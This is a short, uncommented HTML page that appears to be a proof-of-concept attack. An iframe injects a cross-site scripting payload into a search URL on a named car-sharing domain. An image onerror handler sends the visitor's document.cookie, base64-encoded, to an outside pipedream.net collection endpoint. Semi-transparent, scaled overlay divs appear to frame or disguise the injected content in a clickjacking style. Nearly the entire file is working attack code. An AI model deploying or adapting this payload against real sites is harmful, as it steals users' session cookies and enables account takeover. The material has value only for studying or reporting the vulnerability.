<!DOCTYPE html>
<html>
<body>
	
<div style=”border: 2px solid gray;” id="site">
<iframe src=https://360.share-now.com/search/a&lt;%20img%20src=x%20onerror=location.href=%22https:%26sol;%26sol;d79c170ccad4ecc884e9f75146461d2d.m.pipedream.net%26sol;%26quest;q=%22+btoa(document.cookie);%26gt;></iframe>
</div>

<div id="fake1">
<p contenteditable="false">A</p>
</div>

<div id="fake2">
<p contenteditable="false">A</p>
</div>

<div id="fake3">
<p contenteditable="false">A</p>
</div>

<div id="fake4">
<p contenteditable="false">A</p>
</div>


<script>
document.getElementById("site").style.opacity = "0.5";
document.getElementById("fake1").style.opacity = "0.3";
document.getElementById("fake2").style.opacity = "0";
document.getElementById("fake3").style.opacity = "0";
document.getElementById("fake4").style.opacity = "0";
</script>
<style>

#fake1{
	background-color: blue;
	position: absolute;
	width: 10%;
	height: 100%;
}

#fake2{
	background-color: blue;
	position: absolute;
	left: 14.6%;
	width: 85.4%;
	height: 100%;
}

#fake3{
	background-color: blue;
	position: absolute;
	top: 60%;
	width: 100%;
	height: 40%;
}

#fake4{
	background-color: blue;
	position: absolute;
	bottom: 60%;
	width: 100%;
	height: 100%;
}

#site{
	position: absolute;
	border: 0;
	left: 20%;
	transform: translate(-50%, -50%);
	transform: scale(700%, 700%);
	overflow: hidden;
}



</style>

	</body>
</html>

